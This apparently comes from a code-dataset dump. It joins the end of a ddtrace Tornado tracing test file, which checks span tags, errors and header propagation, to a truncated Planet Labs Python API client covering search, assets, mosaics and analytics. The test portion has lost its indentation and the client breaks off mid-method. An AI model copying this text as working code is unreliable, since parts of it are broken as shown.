# check request span
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.NestedHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/nested/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check nested span
nested_span = traces[0][1]
assert "tornado-web" == nested_span.service
assert "tornado.sleep" == nested_span.name
assert 0 == nested_span.error
# check durations because of the yield sleep
assert request_span.duration >= 0.05
assert nested_span.duration >= 0.05
def test_exception_handler(self):
# it should trace a handler that raises an exception
response = self.fetch("/exception/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.ExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "Ouch!" == request_span.get_tag("error.msg")
assert "Exception: Ouch!" in request_span.get_tag("error.stack")
def test_http_exception_handler(self):
# it should trace a handler that raises a Tornado HTTPError
response = self.fetch("/http_exception/")
assert 501 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.HTTPExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 501)
assert self.get_url("/http_exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "HTTP 501: Not Implemented (unavailable)" == request_span.get_tag("error.msg")
assert "HTTP 501: Not Implemented (unavailable)" in request_span.get_tag("error.stack")
def test_http_exception_500_handler(self):
# it should trace a handler that raises a Tornado HTTPError
response = self.fetch("/http_exception_500/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.HTTPException500Handler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/http_exception_500/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "HTTP 500: Server Error (server error)" == request_span.get_tag("error.msg")
assert "HTTP 500: Server Error (server error)" in request_span.get_tag("error.stack")
def test_sync_success_handler(self):
# it should trace a synchronous handler that returns 200
response = self.fetch("/sync_success/")
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SyncSuccessHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/sync_success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_sync_exception_handler(self):
# it should trace a handler that raises an exception
response = self.fetch("/sync_exception/")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SyncExceptionHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/sync_exception/") == request_span.get_tag(http.URL)
assert 1 == request_span.error
assert "Ouch!" == request_span.get_tag("error.msg")
assert "Exception: Ouch!" in request_span.get_tag("error.stack")
def test_404_handler(self):
# it should trace 404
response = self.fetch("/does_not_exist/")
assert 404 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tornado.web.ErrorHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 404)
assert self.get_url("/does_not_exist/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_redirect_handler(self):
# it should trace the built-in RedirectHandler
response = self.fetch("/redirect/")
assert 200 == response.code
# we trace two different calls: the RedirectHandler and the SuccessHandler
traces = self.pop_traces()
assert 2 == len(traces)
assert 1 == len(traces[0])
assert 1 == len(traces[1])
redirect_span = traces[0][0]
assert_is_measured(redirect_span)
assert "tornado-web" == redirect_span.service
assert "tornado.request" == redirect_span.name
assert "web" == redirect_span.span_type
assert "tornado.web.RedirectHandler" == redirect_span.resource
assert "GET" == redirect_span.get_tag("http.method")
assert_span_http_status_code(redirect_span, 301)
assert self.get_url("/redirect/") == redirect_span.get_tag(http.URL)
assert 0 == redirect_span.error
success_span = traces[1][0]
assert "tornado-web" == success_span.service
assert "tornado.request" == success_span.name
assert "web" == success_span.span_type
assert "tests.contrib.tornado.web.app.SuccessHandler" == success_span.resource
assert "GET" == success_span.get_tag("http.method")
assert_span_http_status_code(success_span, 200)
assert self.get_url("/success/") == success_span.get_tag(http.URL)
assert 0 == success_span.error
def test_static_handler(self):
# it should trace the access to static files
response = self.fetch("/statics/empty.txt")
assert 200 == response.code
assert "Static file\n" == response.body.decode("utf-8")
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tornado.web.StaticFileHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/statics/empty.txt") == request_span.get_tag(http.URL)
assert 0 == request_span.error
def test_propagation(self):
# it should trace a handler that returns 200 with a propagated context
headers = {"x-datadog-trace-id": "1234", "x-datadog-parent-id": "4567", "x-datadog-sampling-priority": "2"}
response = self.fetch("/success/", headers=headers)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
# simple sanity check on the span
assert "tornado.request" == request_span.name
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check propagation
assert 1234 == request_span.trace_id
assert 4567 == request_span.parent_id
assert 2 == request_span.get_metric(SAMPLING_PRIORITY_KEY)
    # Opentracing support depends on new AsyncioScopeManager
    # See: https://github.com/opentracing/opentracing-python/pull/118
    @pytest.mark.skipif(
        tornado.version_info >= (5, 0), reason="Opentracing ScopeManager not available for Tornado >= 5"
    )
    def test_success_handler_ot(self):
        """OpenTracing version of test_success_handler.

        Wraps the request in an OpenTracing span and verifies that the
        Datadog request span is parented to it and carries the same tags
        checked by the plain test_success_handler.
        """
        from opentracing.scope_managers.tornado import TornadoScopeManager
        ot_tracer = init_tracer("tornado_svc", self.tracer, scope_manager=TornadoScopeManager())
        with ot_tracer.start_active_span("tornado_op"):
            response = self.fetch("/success/")
            assert 200 == response.code
        traces = self.pop_traces()
        assert 1 == len(traces)
        # both spans end up in the same trace
        assert 2 == len(traces[0])
        # dd_span will start and stop before the ot_span finishes
        ot_span, dd_span = traces[0]
        # confirm the parenting: ot_span is the root, dd_span its child
        assert ot_span.parent_id is None
        assert dd_span.parent_id == ot_span.span_id
        assert ot_span.name == "tornado_op"
        assert ot_span.service == "tornado_svc"
        assert_is_measured(dd_span)
        assert "tornado-web" == dd_span.service
        assert "tornado.request" == dd_span.name
        assert "web" == dd_span.span_type
        assert "tests.contrib.tornado.web.app.SuccessHandler" == dd_span.resource
        assert "GET" == dd_span.get_tag("http.method")
        assert_span_http_status_code(dd_span, 200)
        assert self.get_url("/success/") == dd_span.get_tag(http.URL)
        assert 0 == dd_span.error
class TestTornadoWebAnalyticsDefault(TornadoTestCase):
    """
    Ensure that Tornado web handlers generate APM events with default settings
    """
    def test_analytics_global_on_integration_default(self):
        """
        When making a request
            When the integration-level sample rate is not set and trace search
            is enabled globally
                We expect the root span to have the appropriate tag
        """
        with self.override_global_config(dict(analytics_enabled=True)):
            # it should trace a handler that returns 200
            response = self.fetch("/success/")
            self.assertEqual(200, response.code)
            self.assert_structure(
                dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 1.0}),
            )
    def test_analytics_global_off_integration_default(self):
        """
        When making a request
            When the integration-level sample rate is not set and trace search
            is disabled globally
                We expect the root span to not include the tag
        """
        with self.override_global_config(dict(analytics_enabled=False)):
            # it should trace a handler that returns 200
            response = self.fetch("/success/")
            self.assertEqual(200, response.code)
            root = self.get_root_span()
            self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
class TestTornadoWebAnalyticsOn(TornadoTestCase):
    """
    Ensure that Tornado web handlers generate APM events when trace search is
    enabled at the integration level with an explicit sample rate
    """
    def get_settings(self):
        # enable trace search for the integration with a 0.5 sample rate
        return {
            "datadog_trace": {
                "analytics_enabled": True,
                "analytics_sample_rate": 0.5,
            },
        }
    def test_analytics_global_on_integration_on(self):
        """
        When making a request
            When the integration has trace search enabled with a sample rate
            and trace search is enabled globally
                We expect the root span to carry the integration sample rate
        """
        with self.override_global_config(dict(analytics_enabled=True)):
            # it should trace a handler that returns 200
            response = self.fetch("/success/")
            self.assertEqual(200, response.code)
            self.assert_structure(
                dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 0.5}),
            )
    def test_analytics_global_off_integration_on(self):
        """
        When making a request
            When the integration has trace search enabled with a sample rate
            and trace search is disabled globally
                We expect the integration setting to win: the tag is still set
        """
        with self.override_global_config(dict(analytics_enabled=False)):
            # it should trace a handler that returns 200
            response = self.fetch("/success/")
            self.assertEqual(200, response.code)
            self.assert_structure(
                dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 0.5}),
            )
class TestTornadoWebAnalyticsNoRate(TornadoTestCase):
    """
    Ensure that Tornado web handlers generate APM events when trace search is
    enabled at the integration level without an explicit sample rate
    """
    def get_settings(self):
        # enable trace search for the integration but leave the rate unset
        return {
            "datadog_trace": {
                "analytics_enabled": True,
            },
        }
    def test_analytics_global_on_integration_on(self):
        """
        When making a request
            When the integration has trace search enabled without a sample rate
            and trace search is enabled globally
                We expect the root span tag to fall back to the 1.0 default
        """
        with self.override_global_config(dict(analytics_enabled=True)):
            # it should trace a handler that returns 200
            response = self.fetch("/success/")
            self.assertEqual(200, response.code)
            self.assert_structure(
                dict(name="tornado.request", metrics={ANALYTICS_SAMPLE_RATE_KEY: 1.0}),
            )
class TestNoPropagationTornadoWebViaSetting(TornadoTestCase):
    """Verify that handlers are still traced but incoming distributed-tracing
    headers are ignored when propagation is disabled via application settings."""

    def get_settings(self):
        # distributed_tracing needs to be disabled manually
        return {
            "datadog_trace": {
                "distributed_tracing": False,
            },
        }

    def test_no_propagation(self):
        """Propagation headers must not leak into the request span."""
        headers = {
            "x-datadog-trace-id": "1234",
            "x-datadog-parent-id": "4567",
            "x-datadog-sampling-priority": "2",
            "x-datadog-origin": "synthetics",
        }
        response = self.fetch("/success/", headers=headers)
        assert response.code == 200
        traces = self.pop_traces()
        assert len(traces) == 1
        assert len(traces[0]) == 1
        request_span = traces[0][0]
        # basic sanity checks on the emitted span
        assert request_span.name == "tornado.request"
        assert_span_http_status_code(request_span, 200)
        assert request_span.get_tag(http.URL) == self.get_url("/success/")
        assert request_span.error == 0
        # none of the propagated values may be applied to the span
        assert request_span.trace_id != 1234
        assert request_span.parent_id != 4567
        assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
        assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
class TestNoPropagationTornadoWebViaConfig(TornadoTestCase):
    """
    Ensure that Tornado web handlers are properly traced and are ignoring propagated HTTP headers when disabled.
    """
    def test_no_propagation_via_int_config(self):
        # NOTE(review): this mutates global integration config and never
        # restores it — presumably TornadoTestCase resets config between
        # tests; confirm, otherwise this can leak into other tests.
        config.tornado.distributed_tracing = False
        # it should not propagate the HTTP context
        headers = {
            "x-datadog-trace-id": "1234",
            "x-datadog-parent-id": "4567",
            "x-datadog-sampling-priority": "2",
            "x-datadog-origin": "synthetics",
        }
        response = self.fetch("/success/", headers=headers)
        assert 200 == response.code
        traces = self.pop_traces()
        assert 1 == len(traces)
        assert 1 == len(traces[0])
        request_span = traces[0][0]
        # simple sanity check on the span
        assert "tornado.request" == request_span.name
        assert_span_http_status_code(request_span, 200)
        assert self.get_url("/success/") == request_span.get_tag(http.URL)
        assert 0 == request_span.error
        # check non-propagation: none of the header values may be applied
        assert request_span.trace_id != 1234
        assert request_span.parent_id != 4567
        assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
        assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
    # run in a subprocess so the env var is read at integration setup time
    @TracerTestCase.run_in_subprocess(env_overrides=dict(DD_TORNADO_DISTRIBUTED_TRACING="False"))
    def test_no_propagation_via_env_var(self):
        # it should not propagate the HTTP context
        headers = {
            "x-datadog-trace-id": "1234",
            "x-datadog-parent-id": "4567",
            "x-datadog-sampling-priority": "2",
            "x-datadog-origin": "synthetics",
        }
        response = self.fetch("/success/", headers=headers)
        assert 200 == response.code
        traces = self.pop_traces()
        assert 1 == len(traces)
        assert 1 == len(traces[0])
        request_span = traces[0][0]
        # simple sanity check on the span
        assert "tornado.request" == request_span.name
        assert_span_http_status_code(request_span, 200)
        assert self.get_url("/success/") == request_span.get_tag(http.URL)
        assert 0 == request_span.error
        # check non-propagation: none of the header values may be applied
        assert request_span.trace_id != 1234
        assert request_span.parent_id != 4567
        assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
        assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
class TestCustomTornadoWeb(TornadoTestCase):
    """Verify tracing when the application is configured with a custom
    default handler class."""

    def get_settings(self):
        return {
            "default_handler_class": CustomDefaultHandler,
            "default_handler_args": dict(status_code=400),
        }

    def test_custom_default_handler(self):
        """Requests routed to the custom default handler must be traced."""
        response = self.fetch("/custom_handler/")
        assert response.code == 400
        traces = self.pop_traces()
        assert len(traces) == 1
        assert len(traces[0]) == 1
        request_span = traces[0][0]
        assert request_span.service == "tornado-web"
        assert request_span.name == "tornado.request"
        assert request_span.span_type == "web"
        assert request_span.resource == "tests.contrib.tornado.web.app.CustomDefaultHandler"
        assert request_span.get_tag("http.method") == "GET"
        assert_span_http_status_code(request_span, 400)
        assert request_span.get_tag(http.URL) == self.get_url("/custom_handler/")
        assert request_span.error == 0
| 39.986622 | 117 | 0.651096 |
05099511de6d6b1e2ed0f1f5277805d66fb05665 | 27,424 | py | Python | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | null | null | null | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | null | null | null | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | 1 | 2018-01-28T05:11:20.000Z | 2018-01-28T05:11:20.000Z | # Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
from .dispatch import RequestsDispatcher
from . import auth
from .exceptions import (InvalidIdentity, APIException, NoPermission)
from . import models
from . import filters
class _Base(object):
    '''High-level access to Planet's API.'''

    def __init__(self, api_key=None, base_url='https://api.planet.com/',
                 workers=4):
        '''
        :param str api_key: API key to use. Defaults to environment variable.
        :param str base_url: The base URL to use. Not required.
        :param int workers: The number of concurrent download workers
        '''
        api_key = api_key or auth.find_api_key()
        # no key at all -> self.auth is falsy; requests will be unauthenticated
        self.auth = api_key and auth.APIKey(api_key)
        self.base_url = base_url
        if not self.base_url.endswith('/'):
            self.base_url += '/'
        self.dispatcher = RequestsDispatcher(workers)

    def shutdown(self):
        '''Stop the download worker pool without waiting for pending work.'''
        self.dispatcher._asyncpool.executor.shutdown(wait=False)

    def _url(self, path):
        '''Resolve ``path`` against the base URL unless it is already absolute.'''
        if path.startswith('http'):
            url = path
        else:
            url = self.base_url + path
        return url

    def _request(self, path, body_type=models.JSON, params=None, auth=None):
        '''Build a Request for ``path``, defaulting to this client's auth.'''
        return models.Request(self._url(path), auth or self.auth, params,
                              body_type)

    def _get(self, path, body_type=models.JSON, params=None, callback=None):
        '''Issue a GET request; if ``callback`` is given the body is fetched
        asynchronously, otherwise the caller handles the Response.'''
        # convert any JSON objects to text explicitly
        for k, v in (params or {}).items():
            if isinstance(v, dict):
                params[k] = json.dumps(v)
        request = self._request(path, body_type, params)
        response = self.dispatcher.response(request)
        if callback:
            response.get_body_async(callback)
        return response

    def _download_many(self, paths, params, callback):
        '''Start an asynchronous Image download for each of ``paths``.'''
        return [self._get(path, models.Image, params=params, callback=callback)
                for path in paths]

    def login(self, identity, credentials):
        '''Login using email identity and credentials. Returns a JSON
        object containing an `api_key` property with the user's API_KEY.

        :param str identity: email
        :param str credentials: password
        :returns: JSON object (Python dict)
        :raises InvalidIdentity: if the credentials are rejected (HTTP 401)
        :raises APIException: for any other non-200 response
        '''
        result = self.dispatcher.session.post(self._url('v0/auth/login'),
                                              json={
                                                  'email': identity,
                                                  'password': credentials
                                              })
        status = result.status_code
        if status == 400:
            raise APIException('invalid parameters, login process has changed')
        elif status == 401:
            # do our best to get something out to the user
            msg = result.text
            try:
                msg = json.loads(result.text)['message']
            except (ValueError, KeyError, TypeError):
                # body was not JSON or had no 'message' field: keep the raw
                # text. (Previously this used ``finally: raise``, which also
                # masked unrelated in-flight exceptions.)
                pass
            raise InvalidIdentity(msg)
        elif status != 200:
            raise APIException('%s: %s' % (status, result.text))
        jwt = result.text
        # the API key lives in the JWT payload (second dot-separated segment);
        # re-pad the base64url data to a multiple of 4 before decoding
        payload = jwt.split('.')[1]
        rem = len(payload) % 4
        if rem > 0:
            payload += '=' * (4 - rem)
        payload = base64.urlsafe_b64decode(payload.encode('utf-8'))
        return json.loads(payload.decode('utf-8'))
def _patch_stats_request(request):
    '''If the request has no filter config, add one that should do what is
    expected (include all items)
    see: PE-11813
    '''
    existing = request.get('filter', {}).get('config', None)
    if not existing:
        # an all-inclusive date range stands in for the missing filter
        request['filter'] = filters.date_range('acquired',
                                               gt='1970-01-01T00:00:00Z')
    return request
class ClientV1(_Base):
    '''ClientV1 provides basic low-level access to Planet's API. Only one
    ClientV1 should be in existence for an application. The Client is thread
    safe and takes care to avoid API throttling and also retry any throttled
    requests. Most functions take JSON-like dict representations of API
    request bodies. Return values are usually a subclass of
    :py:class:`planet.api.models.Body`. Any exceptional http responses are
    handled by translation to one of the :py:mod:`planet.api.exceptions`
    classes.
    '''
    def _params(self, kw):
        '''Translate common keyword options into API query parameters.'''
        params = {}
        if 'page_size' in kw:
            params['_page_size'] = kw['page_size']
        if 'sort' in kw and kw['sort']:
            params['_sort'] = ''.join(kw['sort'])
        if 'strict' in kw:
            # This transforms a Python boolean into a JSON boolean
            params['strict'] = json.dumps(kw['strict'])
        return params
    def create_search(self, request):
        '''Create a new saved search from the specified request.
        The request must contain a ``name`` property.
        :param request: see :ref:`api-search-request`
        :returns: :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        body = json.dumps(request)
        return self.dispatcher.response(models.Request(
            self._url('data/v1/searches/'), self.auth,
            body_type=models.JSON, data=body, method='POST')).get_body()
    def quick_search(self, request, **kw):
        '''Execute a quick search with the specified request.
        :param request: see :ref:`api-search-request`
        :param `**kw`: See Options below
        :returns: :py:class:`planet.api.models.Items`
        :raises planet.api.exceptions.APIException: On API error.
        :Options:
        * page_size (int): Size of response pages
        * sort (string): Sorting order in the form `field (asc|desc)`
        '''
        body = json.dumps(request)
        params = self._params(kw)
        return self.dispatcher.response(models.Request(
            self._url('data/v1/quick-search'), self.auth, params=params,
            body_type=models.Items, data=body, method='POST')).get_body()
    def saved_search(self, sid, **kw):
        '''Execute a saved search by search id.
        :param sid string: The id of the search
        :returns: :py:class:`planet.api.models.Items`
        :raises planet.api.exceptions.APIException: On API error.
        :Options:
        * page_size (int): Size of response pages
        * sort (string): Sorting order in the form `field (asc|desc)`
        '''
        path = 'data/v1/searches/%s/results' % sid
        params = self._params(kw)
        return self._get(self._url(path), body_type=models.Items,
                         params=params).get_body()
    def get_searches(self, quick=False, saved=True):
        '''Get searches listing.
        :param quick bool: Include quick searches (default False)
        :param saved bool: Include saved searches (default True)
        :returns: :py:class:`planet.api.models.Searches`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        params = {}
        # quick=True takes precedence over saved when both are requested
        if saved and not quick:
            params['search_type'] = 'saved'
        elif quick:
            params['search_type'] = 'quick'
        return self._get(self._url('data/v1/searches/'),
                         body_type=models.Searches, params=params).get_body()
    def stats(self, request):
        '''Get stats for the provided request.
        :param request dict: A search request that also contains the 'interval'
        property.
        :returns: :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        # work-around for API bug (see _patch_stats_request / PE-11813)
        request = _patch_stats_request(request)
        body = json.dumps(request)
        return self.dispatcher.response(models.Request(
            self._url('data/v1/stats'), self.auth,
            body_type=models.JSON, data=body, method='POST')).get_body()
    def get_assets(self, item):
        '''Get the assets for the provided item representations.
        Item representations are obtained from search requests.
        :param item dict: An item representation from the API.
        :returns: :py:class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        assets_url = item['_links']['assets']
        return self._get(assets_url).get_body()
    def activate(self, asset):
        '''Request activation of the specified asset representation.
        Asset representations are obtained from :py:meth:`get_assets`.
        :param asset dict: An asset representation from the API.
        :returns: :py:class:`planet.api.models.Body` with no response content
        :raises planet.api.exceptions.APIException: On API error.
        '''
        activate_url = asset['_links']['activate']
        return self._get(activate_url, body_type=models.Body).get_body()
    def download(self, asset, callback=None):
        '''Download the specified asset. If provided, the callback will be
        invoked asynchronously. Otherwise it is up to the caller to handle the
        response Body.
        :param asset dict: An asset representation from the API
        :param callback: An optional function to asynchronously handle the
        download. See :py:func:`planet.api.write_to_file`
        :returns: :py:Class:`planet.api.models.Response` containing a
        :py:Class:`planet.api.models.Body` of the asset.
        :raises planet.api.exceptions.APIException: On API error.
        '''
        download_url = asset['location']
        return self._get(download_url, models.Body, callback=callback)
    def get_item(self, item_type, id):
        '''Get the item response for the given item_type and id
        :param item_type str: A valid item-type
        :param id str: The id of the item
        :returns: :py:Class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = 'data/v1/item-types/%s/items/%s' % (item_type, id)
        return self._get(url).get_body()
    def get_assets_by_id(self, item_type, id):
        '''Get an item's asset response for the given item_type and id
        :param item_type str: A valid item-type
        :param id str: The id of the item
        :returns: :py:Class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = 'data/v1/item-types/%s/items/%s/assets' % (item_type, id)
        return self._get(url).get_body()
    def get_mosaic_series(self, series_id):
        '''Get information pertaining to a mosaics series
        :param series_id str: The id of the series
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        url = self._url('basemaps/v1/series/{}'.format(series_id))
        return self._get(url, models.JSON).get_body()
    def get_mosaics_for_series(self, series_id):
        '''Get list of mosaics available for a series
        :param series_id str: The id of the series
        :returns: :py:Class:`planet.api.models.Mosaics`
        '''
        url = self._url('basemaps/v1/series/{}/mosaics'.format(series_id))
        return self._get(url, models.Mosaics).get_body()
    def get_mosaics(self, name_contains=None):
        '''Get information for all mosaics accessible by the current user.
        :param name_contains str: Optional substring filter on mosaic names
        :returns: :py:Class:`planet.api.models.Mosaics`
        '''
        params = {}
        if name_contains:
            params['name__contains'] = name_contains
        url = self._url('basemaps/v1/mosaics')
        return self._get(url, models.Mosaics, params=params).get_body()
    def get_mosaic_by_name(self, name):
        '''Get the API representation of a mosaic by name.
        :param name str: The name of the mosaic
        :returns: :py:Class:`planet.api.models.Mosaics`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        params = {'name__is': name}
        url = self._url('basemaps/v1/mosaics')
        return self._get(url, models.Mosaics, params=params).get_body()
    def get_quads(self, mosaic, bbox=None):
        '''Search for quads from a mosaic that are inside the specified
        bounding box. Will yield all quads if no bounding box is specified.
        :param mosaic dict: A mosaic representation from the API
        :param bbox tuple: A lon_min, lat_min, lon_max, lat_max area to search
        :returns: :py:Class:`planet.api.models.MosaicQuads`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        if bbox is None:
            # Some bboxes can slightly exceed backend min/max latitude bounds
            xmin, ymin, xmax, ymax = mosaic['bbox']
            bbox = (max(-180, xmin), max(-85, ymin),
                    min(180, xmax), min(85, ymax))
        # the quads link is a URL template with lx/ly/ux/uy placeholders
        url = mosaic['_links']['quads']
        url = url.format(lx=bbox[0], ly=bbox[1], ux=bbox[2], uy=bbox[3])
        return self._get(url, models.MosaicQuads).get_body()
    def get_quad_by_id(self, mosaic, quad_id):
        '''Get a quad response for a specific mosaic and quad.
        :param mosaic dict: A mosaic representation from the API
        :param quad_id str: A quad id (typically <xcoord>-<ycoord>)
        :returns: :py:Class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        path = 'basemaps/v1/mosaics/{}/quads/{}'.format(mosaic['id'], quad_id)
        return self._get(self._url(path)).get_body()
    def get_quad_contributions(self, quad):
        '''Get information about which scenes contributed to a quad.
        :param quad dict: A quad representation from the API
        :returns: :py:Class:`planet.api.models.JSON`
        :raises planet.api.exceptions.APIException: On API error.
        '''
        url = quad['_links']['items']
        return self._get(url).get_body()
    def download_quad(self, quad, callback=None):
        '''Download the specified mosaic quad. If provided, the callback will
        be invoked asynchronously. Otherwise it is up to the caller to handle
        the response Body.
        :param quad dict: A mosaic quad representation from the API
        :param callback: An optional function to asynchronously handle the
        download. See :py:func:`planet.api.write_to_file`
        :returns: :py:Class:`planet.api.models.Response` containing a
        :py:Class:`planet.api.models.Body` of the asset.
        :raises planet.api.exceptions.NoPermission: if the quad has no
        download link (the user lacks download permission).
        :raises planet.api.exceptions.APIException: On API error.
        '''
        try:
            download_url = quad['_links']['download']
        except KeyError:
            msg = 'You do not have download permissions for quad {}'
            raise NoPermission(msg.format(quad['id']))
        return self._get(download_url, models.Body, callback=callback)
    def check_analytics_connection(self):
        '''
        Validate that we can use the Analytics API. Useful to test connectivity
        to test environments.
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        return self._get(self._url('analytics/health')).get_body()
    def wfs_conformance(self):
        '''
        Details about WFS3 conformance
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        return self._get(self._url('analytics/conformance')).get_body()
    def list_analytic_subscriptions(self, feed_id):
        '''
        Get subscriptions that the authenticated user has access to
        :param feed_id str: Return subscriptions associated with a particular
        feed only.
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.Subscriptions`
        '''
        params = {'feedID': feed_id}
        url = self._url('analytics/subscriptions')
        return self._get(url, models.Subscriptions, params=params).get_body()
    def get_subscription_info(self, subscription_id):
        '''
        Get the information describing a specific subscription.
        :param subscription_id str: The id of the subscription
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        url = self._url('analytics/subscriptions/{}'.format(subscription_id))
        return self._get(url, models.JSON).get_body()
    def list_analytic_feeds(self, stats):
        '''
        Get feeds that the authenticated user has access to
        :param stats: forwarded as the ``stats`` query parameter
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.Feeds`
        '''
        params = {'stats': stats}
        url = self._url('analytics/feeds')
        return self._get(url, models.Feeds, params=params).get_body()
    def get_feed_info(self, feed_id):
        '''
        Get the information describing a specific feed.
        :param feed_id str: The id of the feed
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        url = self._url('analytics/feeds/{}'.format(feed_id))
        return self._get(url, models.JSON).get_body()
    def list_analytic_collections(self):
        '''
        Get collections that the authenticated user has access to
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.WFS3Collections`
        '''
        params = {}
        url = self._url('analytics/collections')
        return self._get(url, models.WFS3Collections,
                         params=params).get_body()
    def get_collection_info(self, subscription_id):
        '''
        Get the information describing a specific collection.
        :param subscription_id: used as the collection id in the request URL
        (note: the parameter name is historical).
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.JSON`
        '''
        url = 'analytics/collections/{}'.format(subscription_id)
        return self._get(self._url(url), models.JSON).get_body()
    def list_collection_features(self,
                                 subscription_id,
                                 bbox=None,
                                 time_range=None,
                                 before=None,
                                 after=None,
                                 ):
        '''
        List features for an analytic subscription.
        :param subscription_id: collection/subscription to list features for
        :param time_range str: ISO format datetime interval.
        :param bbox tuple: A lon_min, lat_min, lon_max, lat_max area to search
        :param before str: return features published before item with given ID
        :param after str: return features published after item with given ID
        :raises planet.api.exceptions.APIException: On API error.
        :returns: :py:Class:`planet.api.models.WFS3Features`
        '''
        params = {}
        if bbox:
